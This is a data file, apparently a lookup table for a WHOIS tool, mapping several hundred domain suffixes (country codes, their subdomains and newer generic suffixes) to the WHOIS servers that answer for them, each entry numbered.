sa.au:whois.aunic.net 903 | guide:whois.donuts.co 904 | co.kr:whois.kr 905 | ind.tn:whois.ati.tn 906 | org.ky:whois.kyregistry.ky 907 | ia.us:whois.nic.us 908 | maori.nz:whois.srs.net.nz 909 | reisen:whois.udag.net 910 | cleaning:whois.donuts.co 911 | contractors:whois.donuts.co 912 | net.eg:whois.ripe.net 913 | mobi:whois.dotmobiregistry.net 914 | com.ht:whois.nic.ht 915 | com.hr:whois.dns.hr 916 | gripe:whois.name.com 917 | coop.br:whois.nic.br 918 | com.hn:whois2.afilias-grs.net 919 | mil.om:whois.registry.om 920 | com.hk:whois.hknic.net.hk 921 | net.pe:kero.yachay.pe 922 | com.gi:whois2.afilias-grs.net 923 | org.li:whois.nic.li 924 | biz:whois.neulevel.biz 925 | org.lu:whois.restena.lu 926 | tmp.br:whois.nic.br 927 | com.fr:whois.nic.fr 928 | gov.ng:whois.nic.net.ng 929 | tn.us:whois.nic.us 930 | tas.au:whois.aunic.net 931 | gov.dz:whois.nic.dz 932 | be:whois.dns.be 933 | bg:whois.register.bg 934 | ba:whois.ripe.net 935 | bo:whois.nic.bo 936 | bw:whois.nic.net.bw 937 | br:whois.nic.br 938 | by:whois.cctld.by 939 | bz:whois.belizenic.bz 940 | gov.cn:whois.cnnic.net.cn 941 | gov.ec:whois.nic.ec 942 | fin.ec:whois.nic.ec 943 | ac.tz:whois.tznic.or.tz 944 | info.pl:whois.dns.pl 945 | ac.com:whois.verisign-grs.com 946 | info.pr:whois.nic.pr 947 | net.co:whois.nic.co 948 | zj.cn:whois.cnnic.net.cn 949 | sx.cn:whois.cnnic.net.cn 950 | mn.us:whois.nic.us 951 | exposed:whois.donuts.co 952 | ak.us:whois.nic.us 953 | wi.us:whois.nic.us 954 | mil.kz:whois.nic.kz 955 | art.dz:whois.nic.dz 956 | mt.us:whois.nic.us 957 | net.ht:whois.nic.ht 958 | com.az:whois.ripe.net 959 | arts.ro:whois.rotld.ro 960 | info:whois.afilias.info 961 | uy:nic.uy 962 | uz:whois.cctld.uz 963 | us:whois.nic.us 964 | uk:whois.nic.uk 965 | ug:whois.co.ug 966 | ua:whois.ua 967 | bl.uk:whois.nic.uk 968 | pro.ec:whois.nic.ec 969 | eun.eg:whois.ripe.net 970 | sn.cn:whois.cnnic.net.cn 971 | engineering:whois.donuts.co 972 | associates:whois.comlaude.com 973 | chat:whois.donuts.co 974 | int.bo:whois.nic.bo 
975 | codes:whois.comlaude.com 976 | net.hn:whois2.afilias-grs.net 977 | net.ve:whois.nic.ve 978 | games.hu:whois.nic.hu 979 | mil.eg:whois.ripe.net 980 | mil.ec:whois.nic.ec 981 | gs:whois.nic.gs 982 | gr:whois.ripe.net 983 | org.mk:whois.ripe.net 984 | gy:whois.registry.gy 985 | gg:whois.gg 986 | ge:whois.ripe.net 987 | go.jp:whois.jprs.jp 988 | gb:whois.ripe.net 989 | edu:whois.educause.net 990 | gm:whois.ripe.net 991 | gi:whois2.afilias-grs.net 992 | org.hk:whois.hknic.net.hk 993 | garden:whois.donuts.co 994 | wa.au:whois.aunic.net 995 | net.dm:whois.nic.cx 996 | deals:whois.comlaude.com 997 | net.dz:whois.nic.dz 998 | gmbh:whois.uniregistrar.com 999 | pro.br:whois.nic.br 1000 | video:whois.donuts.co 1001 | folkebibl.no:whois.norid.no 1002 | xz.cn:whois.cnnic.net.cn 1003 | tm.hu:whois.nic.hu 1004 | vet.br:whois.nic.br 1005 | degree:whois.donuts.co 1006 | exchange:whois.donuts.co 1007 | com.ky:whois.kyregistry.ky 1008 | com.kz:whois.nic.kz 1009 | sport.hu:whois.nic.hu 1010 | casino:whois.goaustraliadomains.com 1011 | gov.tv:whois.nic.tv 1012 | k12.tr:whois.nic.tr 1013 | ind.in:whois.inregistry.net 1014 | app:whois.donuts.co 1015 | pol.ht:whois.nic.ht 1016 | com.pr:whois.nic.pr 1017 | cloud:whois.nic.cloud 1018 | agr.br:whois.nic.br 1019 | sc.us:whois.nic.us 1020 | net.ua:whois.ua 1021 | sc.ug:whois.co.ug 1022 | tm.fr:whois.nic.fr 1023 | or.ug:whois.co.ug 1024 | or.us:whois.nic.us 1025 | baby:whois.donuts.co 1026 | gov.om:whois.registry.om 1027 | biz.tr:whois.nic.tr 1028 | asso.dz:whois.nic.dz 1029 | nc.us:whois.nic.us 1030 | law.pro:whois.registrypro.pro 1031 | gov.sg:whois.nic.net.sg 1032 | net.uk:whois.nic.uk 1033 | gov.sa:saudinic.net.sa 1034 | gov.sc:whois2.afilias-grs.net 1035 | gov.sb:whois.nic.net.sb 1036 | tax:whois.donuts.co 1037 | net.uy:nic.uy 1038 | gratis:whois.donuts.co 1039 | guru:whois.comlaude.com 1040 | nom.co:whois.nic.co 1041 | info.hu:whois.nic.hu 1042 | de:whois.denic.de 1043 | agrar.hu:whois.nic.hu 1044 | aland.fi:whois.fi 1045 | 
mus.br:whois.nic.br 1046 | fie.ee:whois.tld.ee 1047 | ac.ug:whois.co.ug 1048 | ntr.br:whois.nic.br 1049 | villas:whois.name.com 1050 | ac.il:whois.isoc.org.il 1051 | ac.im:whois.nic.im 1052 | ac.in:whois.inregistry.net 1053 | ac.id:whois.pandi.or.id 1054 | presse.fr:whois.nic.fr 1055 | ac.ir:whois.nic.ir 1056 | industries:whois.comlaude.com 1057 | net.cd:whois.nic.cd 1058 | la:whois2.afilias-grs.net 1059 | net.ch:whois.nic.ch 1060 | net.cn:whois.cnnic.net.cn 1061 | li:whois.nic.li 1062 | lv:whois.nic.lv 1063 | lt:whois.domreg.lt 1064 | lu:whois.restena.lu 1065 | holiday:whois.comlaude.com 1066 | auto:whois.donuts.co 1067 | shop.hu:whois.nic.hu 1068 | bar:whois.nic.bar 1069 | go.th:whois.thnic.net 1070 | university:whois.comlaude.com 1071 | vic.au:whois.aunic.net 1072 | trd.br:whois.nic.br 1073 | boutique:whois.comlaude.com 1074 | arq.br:whois.nic.br 1075 | red:whois.donuts.co 1076 | eco:whois.donuts.co 1077 | org.ng:whois.nic.net.ng 1078 | vacations:whois.uniregistrar.com 1079 | org.nz:whois.srs.net.nz 1080 | co.gg:whois.gg 1081 | com.om:whois.registry.om 1082 | ac.uk:whois.ja.net 1083 | gov.lt:whois.domreg.lt 1084 | gov.lu:whois.restena.lu 1085 | gov.lv:whois.nic.lv 1086 | ar.us:whois.nic.us 1087 | gov.li:whois.nic.li 1088 | or.tz:whois.tznic.or.tz 1089 | art:whois.donuts.co 1090 | sci.eg:whois.ripe.net 1091 | edu.ac:whois.nic.ac 1092 | management:whois.donuts.co 1093 | edu.af:whois.nic.af 1094 | org.il:whois.isoc.org.il 1095 | id.lv:whois.nic.lv 1096 | tx.us:whois.nic.us 1097 | edu.az:whois.ripe.net 1098 | nls.uk:whois.nic.uk 1099 | com.eg:whois.ripe.net 1100 | academy:whois.donuts.co 1101 | jl.cn:whois.cnnic.net.cn 1102 | bet:whois.donuts.co 1103 | gov.br:whois.nic.br 1104 | store.ro:whois.rotld.ro 1105 | agency:whois.donuts.co 1106 | gov.by:whois.cctld.by 1107 | sh:whois.nic.sh 1108 | gov.bo:whois.nic.bo 1109 | gd.cn:whois.cnnic.net.cn 1110 | accountants:whois.donuts.co 1111 | hiphop:whois.uniregistry.net 1112 | co.at:whois.nic.at 1113 | nm.us:whois.nic.us 1114 
| org.pf:whois.registry.pf 1115 | gob.es:whois.nic.es 1116 | edu.pr:whois.nic.pr 1117 | schule:whois.donuts.co 1118 | jx.cn:whois.cnnic.net.cn 1119 | bio.br:whois.nic.br 1120 | fhs.no:whois.norid.no 1121 | pro.cy:whois.ripe.net 1122 | prd.mg:whois.nic.mg 1123 | partners:whois.comlaude.com 1124 | edu.pf:whois.registry.pf 1125 | net.tr:whois.nic.tr 1126 | photography:whois.udag.net 1127 | gov.pl:whois.dns.pl 1128 | gov.pr:whois.nic.pr 1129 | net.th:whois.thnic.net 1130 | intl.tn:whois.ati.tn 1131 | qa:whois.registry.qa 1132 | mil.ge:whois.ripe.net 1133 | org.om:whois.registry.om 1134 | computer:whois.donuts.co 1135 | or.id:whois.pandi.or.id 1136 | gs.cn:whois.cnnic.net.cn 1137 | email:whois.uniregistrar.com 1138 | utazas.hu:whois.nic.hu 1139 | ac.nz:whois.srs.net.nz 1140 | inima.al:whois.ripe.net 1141 | fin.tn:whois.ati.tn 1142 | priv.at:whois.nic.at 1143 | net.bo:whois.nic.bo 1144 | xj.cn:whois.cnnic.net.cn 1145 | net.bz:whois.belizenic.bz 1146 | ci:whois.nic.ci 1147 | ch:whois.nic.ch 1148 | co:whois.nic.co 1149 | cn:whois.cnnic.net.cn 1150 | cl:whois.nic.cl 1151 | cc:whois.enom.com 1152 | cf:whois.dot.cf 1153 | cd:whois.nic.cd 1154 | cz:whois.nic.cz 1155 | cy:whois.ripe.net 1156 | cx:whois.nic.cx 1157 | org.ag:whois.nic.ag 1158 | sarl:whois.donuts.co 1159 | org.al:whois.ripe.net 1160 | int.ru:whois.tcinet.ru 1161 | org.au:whois.aunic.net 1162 | tirana.al:whois.ripe.net 1163 | com.mx:whois.nic.mx 1164 | com.mt:whois.ripe.net 1165 | ha.cn:whois.cnnic.net.cn 1166 | com.mk:whois.ripe.net 1167 | graphics:whois.donuts.co 1168 | com.mg:whois.nic.mg 1169 | net.cy:whois.ripe.net 1170 | ri.us:whois.nic.us 1171 | eus:whois.nic.eus 1172 | pictures:whois.comlaude.com 1173 | info.au:whois.aunic.net 1174 | vc:whois2.afilias-grs.net 1175 | ve:whois.nic.ve 1176 | vg:ccwhois.ksregistry.net 1177 | site:whois.donuts.co 1178 | vu:vunic.vu 1179 | ltd.cy:whois.ripe.net 1180 | ad.jp:whois.jprs.jp 1181 | med.ec:whois.nic.ec 1182 | film:whois.donuts.co 1183 | idf.il:whois.isoc.org.il 1184 | 
gob.bo:whois.nic.bo 1185 | edu.om:whois.registry.om 1186 | erotika.hu:whois.nic.hu 1187 | gov.mt:whois.ripe.net 1188 | name.hr:whois.dns.hr 1189 | yoga:whois.donuts.co 1190 | gov.ma:whois.iam.net.ma 1191 | gov.mg:whois.nic.mg 1192 | insure:whois.donuts.co 1193 | asso.fr:whois.nic.fr 1194 | edu.ng:whois.nic.net.ng 1195 | nt.au:whois.aunic.net 1196 | erotica.hu:whois.nic.hu 1197 | audio:whois.donuts.co 1198 | de.us:whois.nic.us 1199 | net.sb:whois.nic.net.sb 1200 | net.sc:whois2.afilias-grs.net 1201 | clinic:whois.donuts.co 1202 | net.sa:saudinic.net.sa 1203 | fj.cn:whois.cnnic.net.cn 1204 | cim.br:whois.nic.br 1205 | nom.es:whois.nic.es 1206 | pa.us:whois.nic.us 1207 | media.hu:whois.nic.hu 1208 | ski:whois.donuts.co 1209 | parliament.cy:whois.ripe.net 1210 | nic.uk:whois.nic.uk 1211 | shop.ht:whois.nic.ht 1212 | gob.pe:kero.yachay.pe 1213 | haus:whois.donuts.co 1214 | press:whois.nic.press 1215 | gov.cx:whois.nic.cx 1216 | fst.br:whois.nic.br 1217 | web.ve:whois.nic.ve 1218 | gov.co:whois.nic.co 1219 | works:whois.name.com 1220 | off.ai:whois.ai 1221 | fl.us:whois.nic.us 1222 | net.al:whois.ripe.net 1223 | in.us:whois.nic.us 1224 | net.ai:whois.ai 1225 | pri.ee:whois.tld.ee 1226 | net.ae:whois.aeda.net.ae 1227 | gen.nz:whois.srs.net.nz 1228 | net.ag:whois.nic.ag 1229 | net.az:whois.ripe.net 1230 | hi.cn:whois.cnnic.net.cn 1231 | net.au:whois.aunic.net 1232 | host:whois.nic.host 1233 | vgs.no:whois.norid.no 1234 | org.ai:whois.ai 1235 | mil.pl :whois.dns.pl 1236 | ac.yu:whois.ripe.net 1237 | holdings:whois.donuts.co 1238 | software:whois.donuts.co 1239 | go.tz:whois.tznic.or.tz 1240 | com.li:whois.nic.li 1241 | museum:whois.museum 1242 | komforb.se:whois.nic-se.se 1243 | cricket:whois.donuts.co 1244 | buy:whois.donuts.co 1245 | org.pr:whois.nic.pr 1246 | hr:whois.dns.hr 1247 | net.om:whois.registry.om 1248 | ht:whois.nic.ht 1249 | hu:whois.nic.hu 1250 | delivery:whois.donuts.co 1251 | hk:whois.hknic.net.hk 1252 | construction:whois.donuts.co 1253 | 
hn:whois2.afilias-grs.net 1254 | hm:whois.registry.hm 1255 | org.pl:whois.dns.pl 1256 | sex.hu:whois.nic.hu 1257 | hosting:whois.donuts.co 1258 | ms.us:whois.nic.us 1259 | pl:whois.dns.pl 1260 | pro.pr:whois.nic.pr 1261 | pm:whois.nic.pm 1262 | tm.cy:whois.ripe.net 1263 | ink:whois.centralnic.com 1264 | fm.br:whois.nic.br 1265 | book:whois.donuts.co 1266 | xxx:whois.nic.xxx 1267 | conf.au:whois.aunic.net 1268 | cq.cn:whois.cnnic.net.cn 1269 | enterprises:whois.comlaude.com 1270 | british-library.uk:whois.nic.uk 1271 | org.bo:whois.nic.bo 1272 | org.br:whois.nic.br 1273 | from.hr:whois.dns.hr 1274 | org.bw:whois.nic.net.bw 1275 | bike:whois.donuts.co 1276 | school:whois.donuts.co 1277 | mu:whois.nic.mu 1278 | pizza:whois.donuts.co 1279 | plumbing:whois.donuts.co 1280 | wine:whois.donuts.co 1281 | salon:whois.donuts.co 1282 | isla.pr:whois.nic.pr 1283 | london:whois.nic.london 1284 | ne.us:whois.nic.us 1285 | adm.br:whois.nic.br 1286 | ne.ug:whois.co.ug 1287 | or.th:whois.thnic.net 1288 | coffee:whois.donuts.co 1289 | brand.se:whois.nic-se.se 1290 | bolt.hu:whois.nic.hu 1291 | band:whois.donuts.co 1292 | id.au:whois.aunic.net 1293 | rocks:whois.donuts.co 1294 | fitness:whois.donuts.co 1295 | edu.lv:whois.nic.lv 1296 | nv.us:whois.nic.us 1297 | mil.bo:whois.nic.bo 1298 | trading:whois.donuts.co 1299 | mil.br:whois.nic.br 1300 | fh.se:whois.nic-se.se 1301 | ggf.br:whois.nic.br 1302 | mil.by:whois.cctld.by 1303 | ru:whois.tcinet.ru 1304 | network:whois.donuts.co 1305 | rs:whois.rnids.rs 1306 | re:whois.nic.re 1307 | gov:whois.nic.gov 1308 | foundation:whois.donuts.co 1309 | free:whois.donuts.co 1310 | gov.az:whois.ripe.net 1311 | not.br:whois.nic.br 1312 | gov.af:whois.nic.af 1313 | gov.ae:whois.aeda.net.ae 1314 | gov.ac:whois.nic.ac 1315 | edu.al:whois.ripe.net 1316 | basketball:whois.donuts.co 1317 | gr.jp:whois.jprs.jp 1318 | stat.no:whois.norid.no 1319 | press.cy:whois.ripe.net 1320 | top:whois.nic.top 1321 | dog:whois.donuts.co 1322 | tips:whois.donuts.co 1323 | 
fail:whois.donuts.co 1324 | life:whois.donuts.co 1325 | catering:whois.donuts.co 1326 | ventures:whois.donuts.co 1327 | dental:whois.donuts.co 1328 | digital:whois.donuts.co 1329 | zone:whois.donuts.co 1330 | coop:whois.nic.coop 1331 | cool:whois.donuts.co 1332 | dating:whois.donuts.co 1333 | team:whois.donuts.co 1334 | international:whois.donuts.co 1335 | edu.yu:whois.ripe.net 1336 | cab:whois.donuts.co 1337 | group:whois.donuts.co 1338 | now:whois.donuts.co 1339 | mil.lv:whois.nic.lv 1340 | equipment:whois.donuts.co 1341 | vision:whois.donuts.co 1342 | com.tr:whois.nic.tr 1343 | cash:whois.donuts.co 1344 | technology:whois.donuts.co 1345 | taxi:whois.donuts.co 1346 | furniture:whois.donuts.co 1347 | oh.us:whois.nic.us 1348 | org.ir:whois.nic.ir 1349 | storage:whois.donuts.co 1350 | pics:whois.uniregistry.net 1351 | company:whois.donuts.co 1352 | rentals:whois.donuts.co 1353 | systems:whois.donuts.co 1354 | house:whois.donuts.co 1355 | org.kz:whois.nic.kz 1356 | golf:whois.donuts.co 1357 | gold:whois.donuts.co 1358 | express:whois.donuts.co 1359 | community:whois.donuts.co 1360 | pe:kero.yachay.pe 1361 | fund:whois.donuts.co 1362 | repair:whois.donuts.co 1363 | cafe:whois.donuts.co 1364 | land:whois.donuts.co 1365 | capital:whois.donuts.co 1366 | limo:whois.donuts.co 1367 | tools:whois.donuts.co 1368 | camera:whois.donuts.co 1369 | com.pe:kero.yachay.pe 1370 | farm:whois.donuts.co 1371 | healthcare:whois.donuts.co 1372 | recipes:whois.donuts.co 1373 | ltd:whois.donuts.co 1374 | gallery:whois.donuts.co 1375 | va:whois.ripe.net 1376 | education:whois.donuts.co 1377 | parts:whois.donuts.co 1378 | center:whois.donuts.co 1379 | org.pe:kero.yachay.pe 1380 | fyi:whois.donuts.co 1381 | loans:whois.donuts.co 1382 | com.lv:whois.nic.lv 1383 | aarp:whois.nic.aarp 1384 | abarth:whois.afilias-srs.net 1385 | abbott:whois.afilias-srs.net 1386 | abbvie:whois.afilias-srs.net 1387 | abc:whois.nic.abc 1388 | abogado:whois.nic.abogado 1389 | abudhabi:whois.nic.abudhabi 1390 | 
ac:whois.nic.ac 1391 | academy:whois.donuts.co 1392 | accountant:whois.nic.accountant 1393 | accountants:whois.donuts.co 1394 | aco:whois.afilias-srs.net 1395 | active:whois.afilias-srs.net 1396 | actor:whois.unitedtld.com 1397 | adac:whois.nic.adac 1398 | ads:whois.nic.google 1399 | adult:whois.afilias-srs.net 1400 | ae:whois.aeda.net.ae 1401 | aeg:whois.nic.aeg 1402 | aero:whois.aero 1403 | af:whois.nic.af 1404 | afamilycompany:whois.nic.afamilycompany 1405 | afl:whois.nic.afl 1406 | africa:africa-whois.registry.net.za 1407 | ag:whois.nic.ag 1408 | agakhan:whois.afilias-srs.net 1409 | agency:whois.donuts.co 1410 | ai:whois.ai 1411 | aigo:whois.afilias-srs.net 1412 | airbus:whois.nic.airbus 1413 | airforce:whois.unitedtld.com 1414 | airtel:whois.nic.airtel 1415 | akdn:whois.afilias-srs.net 1416 | alfaromeo:whois.afilias-srs.net 1417 | alibaba:whois.afilias-srs.net 1418 | alipay:whois.afilias-srs.net 1419 | allfinanz:whois.ksregistry.net 1420 | allstate:whois.afilias-srs.net 1421 | ally:whois.afilias-srs.net 1422 | alsace:whois-alsace.nic.fr 1423 | alstom:whois.nic.alstom 1424 | am:whois.amnic.net 1425 | americanfamily:whois.nic.americanfamily 1426 | amfam:whois.nic.amfam 1427 | android:whois.nic.google 1428 | anquan:whois.teleinfo.cn 1429 | anz:whois.nic.anz 1430 | aol:whois.nic.aol 1431 | apartments:whois.donuts.co 1432 | app:whois.nic.google 1433 | apple:whois.afilias-srs.net 1434 | aquarelle:whois-aquarelle.nic.fr 1435 | ar:whois.nic.ar 1436 | archi:whois.afilias.net 1437 | army:whois.rightside.co 1438 | arpa:whois.iana.org 1439 | art:whois.nic.art 1440 | arte:whois.nic.arte 1441 | as:whois.nic.as 1442 | asda:whois.nic.asda 1443 | asia:whois.nic.asia 1444 | associates:whois.donuts.co 1445 | at:whois.nic.at 1446 | attorney:whois.rightside.co 1447 | au:whois.audns.net.au 1448 | auction:whois.unitedtld.com 1449 | audi:whois.afilias-srs.net 1450 | audio:whois.uniregistry.net 1451 | auspost:whois.nic.auspost 1452 | auto:whois.uniregistry.net 1453 | 
autos:whois.afilias-srs.net 1454 | avianca:whois.afilias-srs.net 1455 | aw:whois.nic.aw 1456 | ax:whois.ax 1457 | baidu:whois.ngtld.cn 1458 | band:whois.rightside.co 1459 | bank:whois.nic.bank 1460 | bar:whois.nic.bar 1461 | barcelona:whois.nic.barcelona 1462 | barclaycard:whois.nic.barclaycard 1463 | barclays:whois.nic.barclays 1464 | barefoot:whois.nic.barefoot 1465 | bargains:whois.donuts.co 1466 | basketball:whois.nic.basketball 1467 | bauhaus:whois.nic.bauhaus 1468 | bayern:whois.nic.bayern 1469 | bbc:whois.nic.bbc 1470 | bbt:whois.nic.bbt 1471 | bbva:whois.nic.bbva 1472 | bcg:whois.afilias-srs.net 1473 | bcn:whois.nic.bcn 1474 | be:whois.dns.be 1475 | beats:whois.afilias-srs.net 1476 | beauty:whois.nic.beauty 1477 | beer:whois.nic.beer 1478 | bentley:whois.nic.bentley 1479 | berlin:whois.nic.berlin 1480 | best:whois.nic.best 1481 | bestbuy:whois.afilias-srs.net 1482 | bet:whois.afilias.net 1483 | bg:whois.register.bg 1484 | bi:whois1.nic.bi 1485 | bid:whois.nic.bid 1486 | bike:whois.donuts.co 1487 | bingo:whois.donuts.co 1488 | bio:whois.afilias.net 1489 | biz:whois.biz 1490 | bj:whois.nic.bj 1491 | black:whois.afilias.net 1492 | blackfriday:whois.uniregistry.net 1493 | blanco:whois.nic.blanco 1494 | blockbuster:whois.afilias-srs.net 1495 | blog:whois.nic.blog 1496 | blue:whois.afilias.net 1497 | bms:whois.nic.bms 1498 | bmw:whois.ksregistry.net 1499 | bn:whois.bnnic.bn 1500 | bnl:whois.afilias-srs.net 1501 | bnpparibas:whois.afilias-srs.net 1502 | bo:whois.nic.bo 1503 | boats:whois.afilias-srs.net 1504 | boehringer:whois.afilias-srs.net 1505 | bofa:whois.nic.bofa 1506 | bom:whois.gtlds.nic.br 1507 | bond:whois.nic.bond 1508 | boo:whois.nic.google 1509 | boots:whois.nic.boots 1510 | bosch:whois.nic.bosch 1511 | bostik:whois-bostik.nic.fr 1512 | boston:whois.nic.boston 1513 | boutique:whois.donuts.co 1514 | box:whois.aridnrs.net.au 1515 | br:whois.registro.br 1516 | bradesco:whois.nic.bradesco 1517 | bridgestone:whois.nic.bridgestone 1518 | 
broadway:whois.nic.broadway 1519 | broker:whois.nic.broker 1520 | brother:whois.nic.brother 1521 | brussels:whois.nic.brussels 1522 | budapest:whois.nic.budapest 1523 | bugatti:whois.afilias-srs.net 1524 | build:whois.nic.build 1525 | builders:whois.donuts.co 1526 | business:whois.donuts.co 1527 | buy:whois.afilias-srs.net 1528 | bw:whois.nic.net.bw 1529 | by:whois.cctld.by 1530 | bzh:whois.nic.bzh 1531 | ca:whois.cira.ca 1532 | cab:whois.donuts.co 1533 | cafe:whois.donuts.co 1534 | cal:whois.nic.google 1535 | cam:whois.ksregistry.net 1536 | camera:whois.donuts.co 1537 | camp:whois.donuts.co 1538 | cancerresearch:whois.nic.cancerresearch 1539 | canon:whois.nic.canon 1540 | capetown:capetown-whois.registry.net.za 1541 | capital:whois.donuts.co 1542 | capitalone:whois.nic.capitalone 1543 | car:whois.uniregistry.net 1544 | cards:whois.donuts.co 1545 | care:whois.donuts.co 1546 | career:whois.nic.career 1547 | careers:whois.donuts.co 1548 | cars:whois.uniregistry.net 1549 | casa:whois.nic.casa 1550 | case:whois.afilias-srs.net 1551 | caseih:whois.afilias-srs.net 1552 | cash:whois.donuts.co 1553 | casino:whois.donuts.co 1554 | cat:whois.nic.cat 1555 | catering:whois.donuts.co 1556 | catholic:whois.aridnrs.net.au 1557 | cba:whois.nic.cba 1558 | cbs:whois.afilias-srs.net 1559 | cc:ccwhois.verisign-grs.com 1560 | ceb:whois.afilias-srs.net 1561 | center:whois.donuts.co 1562 | ceo:whois.nic.ceo 1563 | cern:whois.afilias-srs.net 1564 | cf:whois.dot.cf 1565 | cfa:whois.nic.cfa 1566 | cfd:whois.nic.cfd 1567 | ch:whois.nic.ch 1568 | chanel:whois.nic.chanel 1569 | channel:whois.nic.google 1570 | chat:whois.donuts.co 1571 | cheap:whois.donuts.co 1572 | chintai:whois.nic.chintai 1573 | christmas:whois.uniregistry.net 1574 | chrome:whois.nic.google 1575 | chrysler:whois.afilias-srs.net 1576 | church:whois.donuts.co 1577 | ci:whois.nic.ci 1578 | cipriani:whois.afilias-srs.net 1579 | city:whois.donuts.co 1580 | cityeats:whois.nic.cityeats 1581 | cl:whois.nic.cl 1582 | 
claims:whois.donuts.co 1583 | cleaning:whois.donuts.co 1584 | click:whois.uniregistry.net 1585 | clinic:whois.donuts.co 1586 | clinique:whois.afilias-srs.net 1587 | clothing:whois.donuts.co 1588 | cloud:whois.nic.cloud 1589 | club:whois.nic.club 1590 | clubmed:whois.nic.clubmed 1591 | cn:whois.cnnic.cn 1592 | co:whois.nic.co 1593 | coach:whois.donuts.co 1594 | codes:whois.donuts.co 1595 | coffee:whois.donuts.co 1596 | college:whois.nic.college 1597 | cologne:whois-fe1.pdt.cologne.tango.knipp.de 1598 | com:whois.verisign-grs.com 1599 | comcast:whois.nic.comcast 1600 | commbank:whois.nic.commbank 1601 | community:whois.donuts.co 1602 | company:whois.donuts.co 1603 | compare:whois.nic.compare 1604 | computer:whois.donuts.co 1605 | comsec:whois.nic.comsec 1606 | condos:whois.donuts.co 1607 | construction:whois.donuts.co 1608 | consulting:whois.unitedtld.com 1609 | contact:whois.nic.contact 1610 | contractors:whois.donuts.co 1611 | cooking:whois.nic.cooking 1612 | cookingchannel:whois.nic.cookingchannel 1613 | cool:whois.donuts.co 1614 | coop:whois.nic.coop 1615 | corsica:whois-corsica.nic.fr 1616 | country:whois-dub.mm-registry.com 1617 | coupons:whois.donuts.co 1618 | courses:whois.aridnrs.net.au 1619 | cr:whois.nic.cr 1620 | credit:whois.donuts.co 1621 | creditcard:whois.donuts.co 1622 | creditunion:whois.afilias-srs.net 1623 | cricket:whois.nic.cricket 1624 | cruise:whois.afilias-srs.net 1625 | cruises:whois.donuts.co 1626 | csc:whois.nic.csc 1627 | cuisinella:whois.nic.cuisinella 1628 | cx:whois.nic.cx 1629 | cymru:whois.nic.cymru 1630 | cyou:whois.afilias-srs.net 1631 | cz:whois.nic.cz 1632 | dabur:whois.afilias-srs.net 1633 | dad:whois.nic.google 1634 | dance:whois.unitedtld.com 1635 | data:whois.afilias-srs.net 1636 | date:whois.nic.date 1637 | dating:whois.donuts.co 1638 | datsun:whois.nic.gmo 1639 | day:whois.nic.google 1640 | dclk:whois.nic.google 1641 | dds:whois.nic.dds 1642 | de:whois.denic.de 1643 | deals:whois.donuts.co 1644 | degree:whois.rightside.co 
1645 | delivery:whois.donuts.co 1646 | deloitte:whois.nic.deloitte 1647 | delta:whois.afilias-srs.net 1648 | democrat:whois.unitedtld.com 1649 | dental:whois.donuts.co 1650 | dentist:whois.rightside.co 1651 | desi:whois.ksregistry.net 1652 | design:whois.nic.design 1653 | dev:whois.nic.google 1654 | diamonds:whois.donuts.co 1655 | diet:whois.uniregistry.net 1656 | digital:whois.donuts.co 1657 | direct:whois.donuts.co 1658 | directory:whois.donuts.co 1659 | discount:whois.donuts.co 1660 | dish:whois.afilias-srs.net 1661 | diy:whois.nic.diy 1662 | dk:whois.dk-hostmaster.dk 1663 | dm:whois.nic.dm 1664 | docs:whois.nic.google 1665 | doctor:whois.donuts.co 1666 | dodge:whois.afilias-srs.net 1667 | dog:whois.donuts.co 1668 | doha:whois.nic.doha 1669 | domains:whois.donuts.co 1670 | dot:whois.afilias-srs.net 1671 | download:whois.nic.download 1672 | drive:whois.nic.google 1673 | dtv:whois.afilias-srs.net 1674 | dubai:whois.nic.dubai 1675 | duck:whois.nic.duck 1676 | dunlop:whois.afilias-srs.net 1677 | durban:durban-whois.registry.net.za 1678 | dvag:whois.ksregistry.net 1679 | dvr:whois.afilias-srs.net 1680 | dz:whois.nic.dz 1681 | eat:whois.nic.google 1682 | ec:whois.nic.ec 1683 | eco:whois.afilias-srs.net 1684 | edeka:whois.afilias-srs.net 1685 | edu:whois.educause.edu 1686 | education:whois.donuts.co 1687 | ee:whois.tld.ee 1688 | email:whois.donuts.co 1689 | emerck:whois.afilias-srs.net 1690 | energy:whois.donuts.co 1691 | engineer:whois.rightside.co 1692 | engineering:whois.donuts.co 1693 | enterprises:whois.donuts.co 1694 | epson:whois.aridnrs.net.au 1695 | equipment:whois.donuts.co 1696 | ericsson:whois.nic.ericsson 1697 | erni:whois.nic.erni 1698 | es:whois.nic.es 1699 | esq:whois.nic.google 1700 | estate:whois.donuts.co 1701 | esurance:whois.afilias-srs.net 1702 | eu:whois.eu 1703 | eurovision:whois.nic.eurovision 1704 | eus:whois.eus.coreregistry.net 1705 | events:whois.donuts.co 1706 | exchange:whois.donuts.co 1707 | expert:whois.donuts.co 1708 | 
exposed:whois.donuts.co 1709 | express:whois.donuts.co 1710 | extraspace:whois.afilias-srs.net 1711 | fage:whois.afilias-srs.net 1712 | fail:whois.donuts.co 1713 | fairwinds:whois.nic.fairwinds 1714 | faith:whois.nic.faith 1715 | family:whois.rightside.co 1716 | fan:whois.nic.fan 1717 | fans:whois.nic.fans 1718 | farm:whois.donuts.co 1719 | fashion:whois.nic.fashion 1720 | fedex:whois.afilias-srs.net 1721 | feedback:whois.nic.feedback 1722 | ferrari:whois.afilias-srs.net 1723 | fi:whois.fi 1724 | fiat:whois.afilias-srs.net 1725 | fidelity:whois.nic.fidelity 1726 | fido:whois.afilias-srs.net 1727 | film:whois.nic.film 1728 | final:whois.gtlds.nic.br 1729 | finance:whois.donuts.co 1730 | financial:whois.donuts.co 1731 | firestone:whois.nic.firestone 1732 | firmdale:whois.nic.firmdale 1733 | fish:whois.donuts.co 1734 | fishing:whois.nic.fishing 1735 | fit:whois.nic.fit 1736 | fitness:whois.donuts.co 1737 | flights:whois.donuts.co 1738 | florist:whois.donuts.co 1739 | flowers:whois.uniregistry.net 1740 | fly:whois.nic.google 1741 | fo:whois.nic.fo 1742 | foo:whois.nic.google 1743 | foodnetwork:whois.nic.foodnetwork 1744 | football:whois.donuts.co 1745 | forex:whois.nic.forex 1746 | forsale:whois.unitedtld.com 1747 | forum:whois.nic.forum 1748 | foundation:whois.donuts.co 1749 | fr:whois.nic.fr 1750 | fresenius:whois.ksregistry.net 1751 | frl:whois.nic.frl 1752 | frogans:whois-frogans.nic.fr 1753 | frontdoor:whois.nic.frontdoor 1754 | fujitsu:whois.nic.gmo 1755 | fujixerox:whois.nic.fujixerox 1756 | fun:whois.nic.fun 1757 | fund:whois.donuts.co 1758 | furniture:whois.donuts.co 1759 | futbol:whois.unitedtld.com 1760 